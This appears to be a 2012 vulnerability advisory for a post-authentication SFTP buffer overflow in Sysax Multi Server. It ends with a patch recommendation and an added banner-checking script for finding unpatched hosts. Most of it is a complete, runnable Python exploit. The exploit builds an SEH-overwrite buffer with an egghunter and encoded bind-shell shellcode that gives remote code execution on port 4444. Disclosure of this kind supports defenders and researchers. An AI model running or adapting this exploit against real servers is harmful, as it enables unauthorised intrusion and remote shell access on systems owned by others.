Sysax Multi Server SFTP Module Buffer Overflow Vulnerability

Published: 2012-02-27
Updated: 2012-02-29

Affected systems:
Codeorigin Sysax Multi Server 5.52
Codeorigin Sysax Multi Server 5.50
Codeorigin Sysax Multi Server 5.25
Codeorigin Sysax Multi Server 4.3
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 52191

Sysax Multi Server is an SSH2 and FTP server for the Windows platform. The implementation of Sysax Multi Server contains a buffer overflow; an attacker can exploit this vulnerability to execute arbitrary code.

<*Source: Craig Freyman
  Link: http://www.pwnag3.com/2012/02/sysax-multi-server-ssh-username-exploit.html
*>

Test method:
--------------------------------------------------------------------------------
Warning: The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Users bear all risk themselves!

#!/usr/bin/python
##########################################################################################################
#Title: Sysax Multi Server 5.53 SFTP Post Auth SEH Exploit (Egghunter)
#Author: Craig Freyman (@cd1zz)
#Tested on: XP SP3 32bit
#Software Versions Tested: 5.53
#Date Discovered: February 22, 2012
#Vendor Contacted: February 23, 2012
#Vendor Response: February 27, 2012
#Vendor Fix: Version 5.55
#Notes: Offset based on home path length. This exploit works for C:\AAAAAAAAAAAAAAAA
#Complete Description: http://www.pwnag3.com/2012/02/sysax-multi-server-553-sftp-exploit.html
##########################################################################################################
import sys
import paramiko

if len(sys.argv) != 5:
    print "[+] Usage: ./filename <Target IP> <Port> <User> <Password>"
    sys.exit(1)

host = sys.argv[1]
port = int(sys.argv[2])
username = sys.argv[3]
password = sys.argv[4]

# The overflow is post-authentication: log in first, then open an SFTP channel.
transport = paramiko.Transport((host, port))
transport.connect(username = username, password = password)
sftp = paramiko.SFTPClient.from_transport(transport)

# msfvenom -p windows/shell_bind_tcp LPORT=4444 -b "\x00" -e x86/shikata_ga_nai
# "DNWPDNWP" is the 8-byte egg tag the egghunter searches memory for.
shell = ("DNWPDNWP"
"\xdb\xd9\xba\xf9\x77\x28\x1b\xd9\x74\x24\xf4\x5e\x29\xc9"
"\xb1\x56\x31\x56\x18\x83\xee\xfc\x03\x56\xed\x95\xdd\xe7"
"\xe5\xd3\x1e\x18\xf5\x83\x97\xfd\xc4\x91\xcc\x76\x74\x26"
"\x86\xdb\x74\xcd\xca\xcf\x0f\xa3\xc2\xe0\xb8\x0e\x35\xce"
"\x39\xbf\xf9\x9c\xf9\xa1\x85\xde\x2d\x02\xb7\x10\x20\x43"
"\xf0\x4d\xca\x11\xa9\x1a\x78\x86\xde\x5f\x40\xa7\x30\xd4"
"\xf8\xdf\x35\x2b\x8c\x55\x37\x7c\x3c\xe1\x7f\x64\x37\xad"
"\x5f\x95\x94\xad\x9c\xdc\x91\x06\x56\xdf\x73\x57\x97\xd1"
"\xbb\x34\xa6\xdd\x36\x44\xee\xda\xa8\x33\x04\x19\x55\x44"
"\xdf\x63\x81\xc1\xc2\xc4\x42\x71\x27\xf4\x87\xe4\xac\xfa"
"\x6c\x62\xea\x1e\x73\xa7\x80\x1b\xf8\x46\x47\xaa\xba\x6c"
"\x43\xf6\x19\x0c\xd2\x52\xcc\x31\x04\x3a\xb1\x97\x4e\xa9"
"\xa6\xae\x0c\xa6\x0b\x9d\xae\x36\x03\x96\xdd\x04\x8c\x0c"
"\x4a\x25\x45\x8b\x8d\x4a\x7c\x6b\x01\xb5\x7e\x8c\x0b\x72"
"\x2a\xdc\x23\x53\x52\xb7\xb3\x5c\x87\x18\xe4\xf2\x77\xd9"
"\x54\xb3\x27\xb1\xbe\x3c\x18\xa1\xc0\x96\x2f\xe5\x0e\xc2"
"\x7c\x82\x72\xf4\x93\x0e\xfa\x12\xf9\xbe\xaa\x8d\x95\x7c"
"\x89\x05\x02\x7e\xfb\x39\x9b\xe8\xb3\x57\x1b\x16\x44\x72"
"\x08\xbb\xec\x15\xda\xd7\x28\x07\xdd\xfd\x18\x4e\xe6\x96"
"\xd3\x3e\xa5\x07\xe3\x6a\x5d\xab\x76\xf1\x9d\xa2\x6a\xae"
"\xca\xe3\x5d\xa7\x9e\x19\xc7\x11\xbc\xe3\x91\x5a\x04\x38"
"\x62\x64\x85\xcd\xde\x42\x95\x0b\xde\xce\xc1\xc3\x89\x98"
"\xbf\xa5\x63\x6b\x69\x7c\xdf\x25\xfd\xf9\x13\xf6\x7b\x06"
"\x7e\x80\x63\xb7\xd7\xd5\x9c\x78\xb0\xd1\xe5\x64\x20\x1d"
"\x3c\x2d\x50\x54\x1c\x04\xf9\x31\xf5\x14\x64\xc2\x20\x5a"
"\x91\x41\xc0\x23\x66\x59\xa1\x26\x22\xdd\x5a\x5b\x3b\x88"
"\x5c\xc8\x3c\x99")

# 32-byte egghunter: scans memory for the "DNWP" tag and jumps to the payload behind it.
egghunter = (
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd"
"\x2e\x3c\x05\x5a\x74\xef\xb8\x44\x4e\x57\x50"
"\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")

nseh = "\x90\x90\xeb\x08"   # next-SEH record: short jump over the handler address
junk = "A" * 256              # offset to the SEH record for the C:\AAAAAAAAAAAAAAAA home path
padding = "B" * (256 -len(junk) - len(shell))   # unused in the final buffer
seh = "\xA1\x47\x92\x5D" #5D9247A1 PPR RPCNS4.dll: *** SafeSEH unprotected ***

# The oversized remote path is the overflow trigger; the egghunter lands first, then finds the shell.
remotepath = junk + nseh + seh + "\x90" * 10 + egghunter + "\x90" * 1000 + shell + "\x90" * 100
localpath = "/tmp/system.log"

print "============================================================================"
print "        Sysax Multi Server <= 5.53 SFTP Post Auth SEH Exploit (Egghunter)   "
print "                                  by cd1zz                                  "
print "                               www.pwnag3.com                               "
print "        Launching exploit against " + host + " on port " + str(port) + " for XP"
print "============================================================================"

sftp.get(remotepath, localpath)
sftp.close()
transport.close()

Recommendation:
--------------------------------------------------------------------------------
Vendor patch: Codeorigin
----------
The vendor has released an upgrade that fixes this security issue; please download it from the vendor's homepage: http://www.ftpshell.com/index.htm
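As an added example (not the advisory's or the exploit author's code), a triage helper that classifies an SSH server banner against the affected versions listed above and the 5.55 fix version; the Sysax banner format, the sample banners and the function names are assumptions.

```python
import re
import socket

# Constructed sample banners for an offline run. The exact identification
# string Sysax Multi Server sends is assumed, not taken from the advisory.
SAMPLE_BANNERS = [
    "SSH-2.0-Sysax_Multi_Server_5.53",
    "SSH-2.0-Sysax_Multi_Server_5.55",
    "SSH-2.0-OpenSSH_5.9p1",
]

# Versions the advisory lists as affected, and the vendor fix version it names.
ADVISORY_VERSIONS = {"4.3", "5.25", "5.50", "5.52", "5.53"}
FIXED_VERSION = "5.55"
_VERSION_RE = re.compile(r"sysax[^0-9]*(\d+)\.(\d+)", re.IGNORECASE)

def version_key(text):
    """Turn '5.5', '5.50' or '4.3' into a comparable tuple; the advisory writes
    minors as two decimal digits (5.25 < 5.50), so a short minor is right-padded."""
    major, minor = text.split(".", 1)
    return (int(major), int(minor.ljust(2, "0")))

def parse_sysax_version(banner):
    """Return the version tuple if the banner identifies Sysax Multi Server, else None."""
    m = _VERSION_RE.search(banner)
    if not m:
        return None
    return version_key("%s.%s" % (m.group(1), m.group(2)))

def assess_banner(banner):
    """'not-sysax', 'patched' (>= 5.55), 'affected' (listed) or 'likely-affected' (older, unlisted)."""
    ver = parse_sysax_version(banner)
    if ver is None:
        return "not-sysax"
    if ver >= version_key(FIXED_VERSION):
        return "patched"
    if ver in {version_key(v) for v in ADVISORY_VERSIONS}:
        return "affected"
    return "likely-affected"

def grab_banner(host, port=22, timeout=5.0):
    """Read the identification string an SSH server sends first (RFC 4253, section 4.2)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        return s.recv(256).decode("ascii", "replace").strip()

if __name__ == "__main__":
    for banner in SAMPLE_BANNERS:
        print(banner, "->", assess_banner(banner))
```

Pair grab_banner with assess_banner across an inventory of hosts to find servers still below the 5.55 fix version.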